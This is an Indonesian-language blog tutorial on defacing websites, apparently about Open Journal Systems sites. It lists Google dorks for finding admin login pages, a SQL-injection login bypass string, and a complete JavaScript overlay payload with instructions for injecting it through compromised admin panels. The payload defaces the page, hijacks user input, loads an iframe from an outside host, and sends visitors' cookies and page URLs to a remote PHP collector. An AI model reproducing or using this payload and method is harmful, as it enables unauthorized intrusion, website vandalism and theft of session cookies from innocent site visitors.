Dork :
inurl:/admin/index.php
inurl:/admin/login.php
inurl:/administrator/index.php
inurl/administrator/login.php
bisa kalian tambahkan intitle:admin / login site:.co.li
Oke Selanjutnya kita buat Catetan di pastebin , Buat JS Overlay nya
/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Pwnd Gasai47"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tumblr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("You Lose , Zuhahahaha");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('You Lose , Zuhahahaha');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('Yoshioka in Your Heart');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
kalian buat new paste , lalu paste kan script di ataswarna merah : buat alert
warna biru : link deface kalian / bekas / mirror , untuk menutupi halaman yang kita JS Overlay
nah kalo udah buat silahkan dorking
Nah kalo udah nemu target kita bypass , tidak semua web bisapassword : '=''or'
Kita Tambah Konten / Kategori / apa yang bisa kita post di web tsb.
nah tadi udah buat pastebin kan ? nah di sini kita gunain :)
kalian klik raw di pastebin kalian
nah keluarnya gini , sekarang kita tambah java script :)
ex :
warna merah ganti link pastebin raw kalian :)
Jedooorrrr!!
demo < kalo udah di patch jgn salahin hehe
Tidak ada yang tidak mungkin selai kita belajar , mengembangkan , kreasi sendiri lebih baik
kacang tidak lupa kulit nya lebih indah :)
sumber : http://blog.garudasecurityhacker.org/2016/12/tutorial-deface-dengan-bypass-admin.html
tag : tutorial deface bypass admin , tutorial deface dengan ojs , cara deface bypass admin + ojs
Tutorial deface ojs ( open journal sytem )
Tutorial deface ojs ( open journal sytem )
No comments:
Post a Comment